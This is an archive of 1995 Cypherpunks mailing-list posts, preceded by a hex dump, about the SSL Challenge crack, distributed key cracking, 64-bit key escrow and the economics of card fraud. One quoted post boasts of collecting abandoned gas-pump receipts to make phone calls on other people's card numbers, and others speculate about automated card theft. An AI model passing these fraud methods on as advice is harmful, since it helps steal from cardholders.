0x8c 0xde 0x67 0xec 0x0d 0xa2 0x8d 0xb9 0xb8 0xcf 0xbe 0x21 0xd9 0x08 0xe6 0xb5
0x5a 0x00 0x07 0x8d 0xe1 0xe1 0x1a 0x4a 0xb8 0x7e 0x76 0xfc 0x49 0x68 0x7a 0xf9
0xc7 0xa6 0x99 0xeb 0xff 0x6f 0xd9 0xf6 0x10 0x78 0x55 0xc2 0x4b 0x6a 0x05 0xa3
0xb1 0x3d 0xce 0x55 0x41 0x8d 0x9c 0x3d 0x18 0xa7 0x90 0x37 0x60 0x90 0x6b 0x60
0xad 0x4c 0x20 0xcd 0x12 0x5c 0x53 0x54 0xff 0x39 0x65 0xff 0xfc 0x0f 0x31 0x80
0x9b 0x58 0xc3 0x7c 0xbe 0x09 0xf7 0x8e 0x67 0x60 0x39 0x4b 0x29 0xdf 0xcf 0x57
0x4a 0x6b 0xf5 0xe4 0xd3 0x5d 0x68 0x45 0xa0 0x87 0x06 0xde 0x05 0x7d 0x00 0xd2
0x3a 0x1a 0x86 0x01 0xbf 0x99 0x29 0x11 0x7f 0xf8 0x56 0x90 0x1f 0xd7 0xfd 0xe5
0x1c 0xd8 0xf6 0x95 0x4e 0xc2 0xfb 0x1f 0x93 0x2d 0x50 0x15 0xa6 0x1b 0x00 0x55
0x94 0x32 0xc6 0x47 0x9f 0xee 0xb5 0xae 0xb8 0x31 0xfc 0x9b 0xe1 0x76 0xd2 0x28
0xf3 0xf3 0xf5 0xbb 0x34 0x48 0x13 0xcb 0x54 0x25 0x0f 0x7b 0xa8 0xd1 0xa7 0x6b
0xcc 0x14 0x5b 0x8e 0xf4 0x43 0x6a 0x80 0x1d 0xad 0x43 0x57 0x90 0x86 0x7b 0x04
0x31 0x1e 0x78 0x88 0xdd 0x5d 0xd9 0xa3 0x02 0x4b 0xdd 0xdf 0x2b 0x95 0x92 0xa3
0xad 0x79 0x47 0xc1 0x34 0x3f 0xb2 0x01 0x89 0x05 0x2d 0x26 0xc4 0x75 0x34 0xaa
0x25 0xb2 0x54 0x2d 0xf1 0x92 0xea 0x9b 0xe7 0x9a 0x38 0xba 0x91 0x65 0x40 0x2e
0xff 0x2b 0x31 0x1d 0xd9 0xaa 0x6e 0x19 0xca 0x49 0xc3 0xda 0x40 0xa1 0x71 0x11
0x98 0xb4 0x02 0xe8 0x16 0xaf 0x51 0x72 0xe9 0xf2 0xf3 0x11 0x6d 0xf6 0x21 0x0d
0x1a 0xb5 0xbe 0xe0 0xbe 0x28 0x54 0xb2 0xb9 0x7c 0xf4 0xf0 0x94 0x32 0xa6 0xdd
0x43 0x94 0x96 0xa9 0x55 0x5a 0x8a 0x96 0x44 0x06 0x30 0x3c 0x74 0x39 0x33 0x01
0x1d 0x29 0x7f 0x0a 0xfd 0xe2 0x65 0x3c 0xf5 0x6b 0xee 0xef 0xa5 0xd6 0x15 0x57
0x93 0xca 0xde 0x46 0xee 0x93 0xb0 0x4b 0x32 0xfb 0xd4 0x6e 0xb4 0xa6 0xd7 0x77
0x40 0x64 0x08 0xd2 0x0e 0x57 0x51 0x5c 0xc9 0x2b 0x9b 0x17 0xcb 0x19 0x1f 0x03
0x23 0xcc 0x99 0x3c 0xfa 0x3d 0x21 0xe1 0x6c 0x83 0x1c 0xce 0x68 0x38 0xff 0x0d
0x53 0xcd 0xdd 0xd3 0xd1 0x78 0x6e 0x1e 0xee 0x01 0xe7 0x71 0x0b 0xab 0xd7 0x55
0x6c 0xbd 0x5b 0xac 0x47 0x2c 0x9f 0x23 0xf2 0xf2 0x27 0x1f 0xb3 0x26 0xd8 0x66
0xa6 0x30 0xb8 0x31 0x5e 0x50 0x35 0xba 0x65 0x9f 0x73 0xae 0x66 0x43 0x87 0x46
0x60 0x79 0x3a 0x29 0x21 0x85 0x9a 0xd9 0xcc 0x7d 0x57 0x13 0x9c 0xfc 0x8f 0xb5
0x98 0x3f 0x7c 0x38 0x4b 0x9f 0x43 0x02 0x8b 0xa0 0x2c 0x40 0x32 0x3b 0x7a 0x2e
0x61 0x5f 0xaf 0x91 0xf3 0x26 0x39 0xf0 0xc5 0x73 0xd0 0x2e 0x00 0x44 0x70 0xc3
0xca 0xdf 0xc6 0x73 0x5f 0x6b 0xd3 0xa5 0x3b 0x24 0xdd 0xd0 0x95 0x20 0x61 0x75
0x25 0xbd 0x30 0xb0 0x5b 0xe8 0xd2 0xe6 0xdd 0x02 0xea 0xc1 0x6f 0x91 0xaf 0xbe
0xb6 0x94 0xf6 0xd7 0x9d 0x5e 0xee 0x1d 0xa5 0x76 0x6c 0x22 0xb7 0x42 0x9b 0xa2
0x9a 0x35 0xfe 0xa4 0xb1 0xcb 0x4b 0xcc 0xb7 0xda 0x2f 0x86 0xd0 0x6a 0x6f 0x85
0x9c 0x7c 0xd5 0xae 0xa5 0x46 0xf0 0x06 0x03 0x23 0x51 0xcb 0xe7 0x7d 0xe4 0xbb
0xeb 0x2b 0x51 0xd6 0x9d 0xb2 0xd9 0x09 0xfe 0xec 0x66 0x43 0x71 0x8d 0x53 0x92
0x6e 0x9f 0xb9 0x1c 0x44 0x2b 0x5e 0xfb 0xe8 0x2a 0x2a 0xbb 0x91 0x48 0xdd 0x14
0x06 0x07 0x99 0xb4 0x88 0x86 0x1d 0xb5 0x37 0xf3 0xeb 0xdd 0xf3 0xfa 0x53 0xbb
0xd1 0xfb 0x6b 0xab 0x23 0x4d 0x30 0x7c 0x92 0x56 0x3e 0x18 0xee 0x19 0xff 0x19
0x26 0x55 0xa6 0x65 0xba 0x6f 0x84 0xc0 0x3a 0xd9 0x25 0x0e 0xf9 0x98 0x3e 0x32
0xd4 0xb8 0x77 0xf5 0x7b 0x55 0xdb 0x1e 0xad 0x42 0x36 0x39 0xb6 0x1e 0x51 0xff
0xef 0x60 0x14 0x2e 0xa1 0x8f 0xd2 0x20 0x0c 0x1e 0xf5 0x3e 0x02 0x47 

This completes the communication.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@guetech.com>
Date: Sat, 19 Aug 95 10:43:46 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: SSL challenge and escrows
In-Reply-To: <9508181635.AA23177@all.net>
Message-ID: <Pine.LNX.3.91.950819100112.1510D-100000@guetech.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Dr. Frederick B. Cohen wrote:

> I think a lot of people miss the distinction between automated message
> cracking and dumpster diving.  Dumpster diving is not free.  It costs at
> least a dollar each to get credit card slips by dumpster diving. 

  I think people have been forgetting something else. Getting caught.

  If I dive dumpsters, grab receipts from where I work, etc. The chances 
of me being caught, or linked to use of the CC#s is much higher than if I 
scam them from somewhere on the net, using a cracked account(or several) 
on machines all over the world.

  Another thought is an un-ethical ISP. They either sniff the SSL 
transactions to their web server, or take the numbers from the users 
directories. If discovered, they blame it on 'hackers'.

  What happens to the SSL encrypted data after received by the server?

    Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham Toal <gtoal@gtoal.com>
Date: Sat, 19 Aug 95 08:53:57 PDT
To: cypherpunks@toad.com
Subject: Has anyone written a 'secure' (ahem) html server?
Message-ID: <199508191549.KAA25681@fajita.vt.com>
MIME-Version: 1.0
Content-Type: text/plain


Congrats to the guys who broke the netscape encryption.  Now... as
someone who would like to use 'lite' encryption for a few non-critical
purposes, has anyone taken the code they must have worked out
to do the crack and fed it back in to a public domain server?  I
*really* don't want to pay Netscape 1000's just to play around
with this stuff...  (I presume the algorithms are public and
there wouldn't be any legal problem with this...)

G
PS Yes, I'm back.  Was avoiding all cypherpunkly things until I
got my green card.  First thing I did when it arrived in the mail
was log in to MIT and get an official release of pgp :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@guetech.com>
Date: Sat, 19 Aug 95 12:17:33 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Apologies
Message-ID: <Pine.LNX.3.91.950819113714.2807A-100000@guetech.com>
MIME-Version: 1.0
Content-Type: text/plain



  Sorry, the group of SSL related files wasn't supposed to go to the 
list. Its been one of those weeks, you know?

   Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 08:45:12 PDT
To: cypherpunks@toad.com
Subject: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508191545.LAA16285@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Fourth Foresight Conference on Molecular Nanotechnology


SUMMARY: The conference will be held November 9-11, 1995, in 
Palo Alto.


It is a multidisciplinary meeting on molecular nanotechnology, 
that is, thorough 
three-dimensional structural control of materials and devices 
at the molecular  level.


Attendees will include chemists, materials scientists, 
physicists,  engineers, and computer scientists interested in 
learning about the field and  participating in its development.


For further information, contact


     foresight@cup.portal.com


or see the Web page


     ftp://ftp.parc.xerox.com/pub/nano/nano4.html.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 19 Aug 95 09:21:27 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <199508191621.MAA09036@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 18 Aug 1995 23:03:47 -0400 (EDT)
>From: JMKELSEY@delphi.com
>Subject: Export policy change

>I think this is an important and somewhat subtle political move on
>the part of the administration.  If they can get at least a few
>large businesses (the ones who buy into the key-escrow scheme) on
>their side, by making it in their economic interests for everyone
>to use escrowed crypto, they will have manufactured some
>potentially powerful allies in the computer industry.  

That's not too far from Steve Walker's published intention with the CKE
project.

See:  ftp://ftp.tis.com/pub/crypto/drc/papers/  and below.

 - Carl



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 19 Aug 95 12:39:55 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
Message-ID: <ac5b5baa2202100424d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 8/18/95, Howard Cheng wrote:

>We need to make sure that someone did do the work honestly, but I don't know
>how to check this (other than doing the work yourself to confirm the results,
>but this defeats the whole point of the system).  Perhaps we should require
>that people buy the work first, and when they report the results, they get
>the money back + some profits.

The "abstract protocol" that works in many economic transactions is simple:
_spot checks_. That is, random samples. You don't have to do all the work
yourself.

"Quality Control" (QC) is based on this. The "Inspected By: Foobar" tags on
manufactured items provided traceability/feedback to a manufacturer--a
reputation system, if you will. Lot numbers, seals, etc.

Yes, this is an obvious point, but it's interesting because the "spot
check" is a kind of protocol that is almost like "cut and choose" in its
crypto connotations.

>Assuming everyone is honest, I am sure many people in businesses

As the Great Leader once said, "Trust, but verify."

There is no reason to make assumptions about honesty: just spot check the
work and downgrade the reputation of anyone who slacks off or is deceitful.

(This "web of distrust," in terms of black marks in reputations, is as
important as the web of trust. The same, really. And yet another reason why
one doesn't want government=root, as they would undoubtedly frown on
anything that was "discriminatory" or "hurtful to the differently abled.")

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 19 Aug 95 12:40:00 PDT
To: cypherpunks@toad.com
Subject: Liability for Key Cracking in Idle Hours?
Message-ID: <ac5b5ee423021004e6b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have a feeling that many businesses will set policies to try to stop
their workstations and computers from being used in key cracking attempts.

They don't now, mainly because for one thing they don't even know about it,
and for another thing, it would be a headache to try to administer such a
ban.

However, the notion that "IBM Corporation" or "Bank of America" will say
"Sure, use our idle CPU time to try to crack keys!" seems farfetched.

California is one jurisdiction that has made "hacking" a crime. Not clear
what this means, but some construe it to mean that any attempts to break
into the account of another--or crack a key--is a crime. Not tested in
court, etc. But will Bank of America want to decide whether a key cracking
effort is a "legitimate academic exercise" (such as the SSL Challenge was,
as it involved no damage to any party) or an attempt to use their computers
to break into an account or to otherwise compromise a transaction?

(I am NOT saying that key-cracking = hacking, in the negative sense of
"hacking," but I can certainly imagine cases where it would be. And when
Microsoft Network comes out, soon, I think a lot of people will want to
poke holes in its security, as we've already seen a bit of. Corporations
will not likely take kindly to being involved in something like this.)

Thus, I expect something in between the extremes:

-- corporations fear liability and will not openly encourage this, even to
make a few extra bucks (and it's not at all clear how such bucks would be
made, or if big companies would give a rat's ass about earning a few
dollars a night....)

-- but people with access to these machines will continue to use them for
key cracking, factoring, etc. challenges.

Could I be wrong in this? Sure. Maybe companies will not care. I doubt
this, though.

Damien may be able to tell us if Ecole Polytechnique has raised any
questions about his highly-publicized attack on the SSL Challenge key. I
will _speculate_ that the normally-security-conscious French are
considering policies against this. After all, this is one of the countries
that bans private possession of strong crypto. (Or, as a French computer
scientist told me recently, "Sure, one can apply for a license for
crypto...the procedure is the same as applying for a license for your own
private Exocet missile.")


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 19 Aug 95 11:50:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <Pine.LNX.3.91.950819123758.27374A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

i was thinking about the recent Clinton/LEA proposal regarding exportable 
crypto.  the new rules would allow 64 bit keys to be exported, as long
as the master key was made available through some key escrow service.

now, we know it is relatively easy to break a 40 bit key.
additionally, we know it is nearly impossible to break 128 bits.  i'm
not so sure how hard 64 bits is (need to brush up on that ol'
mathematics some time...).

why did the govt pick 64 bits?  is this length still within the range
of the NSA if they really wanted to read something but didn't feel the
need or want the exposure of obtaining a key from escrow?

i'm curious if anyone thinks this gives us a little more info on the
capabilities of the NSA regarding brute forcing a key.  additionally,
since this *is* an escrow system, why didn't the gov't just go with
the unbreakable 128 bit key length?  

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDYyb03Qo/lG0AH5AQGhDwP/c2NmiU3IwQSAPuYyFgLG3o8Tc+8i9v7b
j8+vdT9wwmBM0hMXtIya6Dnb9hHo+oyBJkL+70N44sV7gy+J6LlZQcY/dNICAdD5
lEJ67YEfKp5Mb010MljsEcwMEIhjZ/IWrhSZipg4rkfIutXCIj6iNvOtOgi9WjKW
wz1j7FimJpI=
=1j3L
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 19 Aug 95 11:58:08 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
In-Reply-To: <9508191823.AA23991@all.net>
Message-ID: <Pine.LNX.3.91.950819125208.27374B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 19 Aug 1995, Dr. Frederick B. Cohen wrote:

> Date: Sat, 19 Aug 1995 14:23:14 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: Flame Remailer <remailer@flame.alias.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
> 
> > 
> But you miss the costs of your time.  You have to find the right
> dumpster, you have to dive, you have to find the slip, you have to walk
> across the street, you have to make the call.  Time, as they say, is
> money.  For a criminal enterprise to make money, they have to not only

howdy,

time is not money if you're a high school student with nothing else to 
do.  time is not money if you're a grad student.  i spend approx 14 hrs 
or more a day in the lab seven days a week.  there's no way my stipend 
adds up to anything close to minimum wage at that rate.  

the value of time is subjective.  if i had a wife and a couple of kids 
AND i was a grad student, my time would be worth more.  as it is, my time 
is not worth a whole lot.

you're assessment that this cost our anon friend some money to obtain 
these cc numbers is simply not true.  when you have nothing else to do, 
choosing one thing over another involves no cost.  if anything, he made 
money by using the cc numbers to make long dist calls instead of using 
any cash he might have from working or an allowance.

my $0.02,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDY0T03Qo/lG0AH5AQEmuwP9F30sfk4PrGRqf5kqsKs1lcX67CSctU/z
hJEM8a1IFpPQL+FHRfy2eRueWNa1OiuyQZN8qt8EiP93MzScEJCEomxaTKowQjQk
p9cQKg2SsFmxgc4whS4Ny22x3Aw1FinB2DzlhPrDB6jLAT1cWkQrE7K85VSCcC+j
AVjV0CS0ufM=
=7tS0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sat, 19 Aug 95 13:19:04 PDT
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: So, NSA can break 64-bit keys
In-Reply-To: <199508191040.GAA20763@panix.com>
Message-ID: <9508191318.TE26772@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 19,  6:40, Duncan Frissell wrote:
> I guess this means no source code.  Are there any software encryption
> systems that can't be modified after the fact?

Undoubtedly, they'll set things up so that if one modifies the 
software to break the escrow feature, one won't be able to 
interoperate with "legitimate" users (i.e. those who haven't 
disabled the escrow feature). 


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.4.8.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 19 Aug 95 11:08:02 PDT
To: howard@cs.ualberta.ca
Subject: Load-sharing for Key Cracking
Message-ID: <9508191807.AA22499@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Someone should look at Condor, ftp.cs.uwisc.edu.
It's designed to share spare cycles.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 19 Aug 95 11:18:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508191818.AA22531@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I think there are many people who might be willing to use an
"anon CA" should it exist:
	Whistleblowers, perhaps Deep Throat would have used email
	People writing letters to the editor who don't want to trust
		the editor to withhold their info
	People who desire anonymyity yet don't want to trust the gov't
		to certify their communications as authentic/forged
		(Unabomber, Om Shin-rkyo)
	Any number of writers who have used psuedonyms and now want to
		get paid in ecash; Mark Twain?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 19 Aug 95 11:25:03 PDT
To: remailer@flame.alias.net (Flame Remailer)
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
In-Reply-To: <199508191631.SAA10338@utopia.hacktic.nl>
Message-ID: <9508191823.AA23991@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> fc@all.net wrote:
> >I think a lot of people miss the distinction between automated message
> >cracking and dumpster diving.  Dumpster diving is not free.  It costs at
> >least a dollar each to get credit card slips by dumpster diving.
> >
> >Consider that in order to use the information, you have to get the slip,
> >pull off the numbers, enter them into a computer (or even worse yet,
> >create a phoney card or make a phone call) in order to use the
> >information.  The break-even point for an automated cracking and usage
> >system is more than a dollar per stolen card.  My parallel processor
> >is actually more cost effective for crimilar theft via credit card fraud.
> 
> Well, a few years ago I partially satisfied my phone-phreaking habit in
> the following manner:
> I would walk up to a busy intersection in a comercial area and stroll
> through the various gas stations located there, collecting receipts
> that careless customers had forgotten to take with them after using the
> "pay-at-the-pump".  Then I would visit the pay phones at the nearby
> mini-malls.  It sure didn't cost me a dollar a number.

But you miss the costs of your time.  You have to find the right
dumpster, you have to dive, you have to find the slip, you have to walk
across the street, you have to make the call.  Time, as they say, is
money.  For a criminal enterprise to make money, they have to not only
get the cards, but use them and then resell the goods for cash.  The
sheer size of a criminal organization that could handle the sort of
codebreaking we are talking about would make it possible to buy goods at
wholesale prices, so the profit on stealing goods and reselling them on
the open market is far less than the savings an individual gains by the
effort.  Then there is the potential cost of people getting caught, etc. 
that has to be figured into the overall cost.  Criminal enterprises have
high overheads.

> The cost/value of a card number depends a lot on what you seek to gain.
> If it's free phone calls, your costs are basically nil.

It costs you 10-15 minutes of time, and it probably saves you a few
dollars of phone charges.  If the chance is only 1 in 100,000 of
getting caught and convicted to 5 years in prison, the amortised time
cost is another 25 minutes, not including legal fees.

>  If you want
> free gas, it'll cost you $500 or so for the card reader/writer and a
> few old cards.

But you still have to get the magic numbers.  Maybe it takes a bribe,
maybe it takes dumpster diving, but whatever the deal, it all costs
money in the form of time, overhead, etc.

>  If you have a system for extracting thousands of dollars
> from each card, economics of scale would probably justify the $10000
> rc4-breaker.

The point of the parallel processor is that the cost is about $1.45 (or
whatever) per card number, not thousands of dollars.  The results are in
computer-ready form, so that you can charge directly over the Internet
and have a fully automatic system for theft.  No large number of
employees, no phone bills that get traced by the FBI, only an Internet
link that moves from provider to provider, account to account, city to
city, country to country.

>  ...or you could just hack netcom, steal the mother lode
> and be set for life...  (Hi Kevin!  drop me a line when you get out;
> ya gotta love those plea-bargains - 30 year sentence reduced to 8
> months! ;-)

It's true that breaking into computer systems is cheaper for small
numbers, but as a big business, the labor is too high for this sort
of attack, and the results are too unpredictable.  Taking credit card
nuymbers over the net is a lot more ammenable to the economies of scale
required for big codebreaking efforts.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Sat, 19 Aug 95 14:31:12 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <9508191730.aa02322@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 PM 8/19/95 -0600, zinc wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>cpunks,
>
>i was thinking about the recent Clinton/LEA proposal regarding exportable 
>crypto.  the new rules would allow 64 bit keys to be exported, as long
>as the master key was made available through some key escrow service.
[good stuff deleted]

>since this *is* an escrow system, why didn't the gov't just go with
>the unbreakable 128 bit key length?  

   This is the kicker!  If what I heard is true, anyone can escrow the keys
under this new plan.  We know that the govt has no problem breaking it's one
rules by saying the magic words "matter of national security", so why don't
they require the keys be held by the govt?
   ... You know they can break it.   ...  I guess they assume the middle
american will buy it!  Just kills me.  

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Sat, 19 Aug 95 14:39:42 PDT
To: cypherpunks@toad.com
Subject: Re: The Official Cypherpunks Screen Saver?
Message-ID: <9508191738.ab02416@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 AM 8/17/95 -0700, you wrote:
>At 5:11 PM 8/17/95, Jim Gillogly wrote:
>
>>I would hazard a guess that 90% of the compute cycles in the world are used
>>running screen savers... this gives a <lot> of slack for people who would
>>like to harness them to perform productive work like making points about
>>the strength of security.
>
>It would really be cool to have a screen saver that did useful work while
>displaying pretty pictures.
>
>Imagine a screen saver, maybe with code modules running in "After Dark,"
>that updates the screen with keys tried...could be a nice demonstration of

   With the strength of today's NT workstations (Multi-processor pentium and
Alpha chips) this would be a great idea.  Every NT workstation ships with a
screen saver built in.  I'd use that one.  Too much fun!
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 12:09:49 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks on IRC?
Message-ID: <199508191906.PAA27899@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Where do the CPs hang out on IRC?
I am just giving IRC another try and there was no CP channel (There is
now). Perhaps we are too busy writing code? <g>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDY13yoZzwIn1bdtAQHe7QF8CyJJsrUtP7RPckKwRegQ1yTUbL7wreip
moqo7qqcehtE5efi4aCHPMleBU7eZNH/
=DWBj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 12:17:13 PDT
To: cypherpunks@toad.com
Subject: Re: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <199508191913.PAA27964@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article
<Pine.LNX.3.91.950819123758.27374A-100000@zifi.genetics.utah.edu>,
zinc@zifi.genetics.utah.edu (zinc) wrote:


>why did the govt pick 64 bits?  is this length still within the range
>of the NSA if they really wanted to read something but didn't feel the
>need or want the exposure of obtaining a key from escrow?
>
>i'm curious if anyone thinks this gives us a little more info on the
>capabilities of the NSA regarding brute forcing a key.  additionally,
>since this *is* an escrow system, why didn't the gov't just go with
>the unbreakable 128 bit key length?  

I think the obvious conclusion would be because 64bits is crackable  if
need be and if you have the resources the goverment has. Not for routine
monitoring of undesirables, but for those special cases where they don't
want to expose their activities by requesting a warrant.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDY3jSoZzwIn1bdtAQGV3gGA26/BZOnXiuMuO8IDgGCnnONVhVtL4/o1
5HVVD3Mqfjp3Sr7QJMQMrfD4JRWRphTL
=evHi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Sat, 19 Aug 95 15:45:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge #2
In-Reply-To: <199508192042.QAA29044@calum.csclub.uwaterloo.ca>
Message-ID: <199508192242.PAA18690@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


>Is there a standard way we're supposed to get together to divvy up the
>keyspace?  Not knowing of any, I'll just announce that I'm working
>on those keys that start with "a", from 0xafffffffff down to 0xa000000000.

Thought the idea was to demonstrate how FAST we could all do this together,
rather than how SOON.  'Course, I could be wrong ...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDZoYYQO/w1Q7FIdAQG9FQP/ed4ZZrL5L1drbLb7pYGoxdSoL3GJ3m09
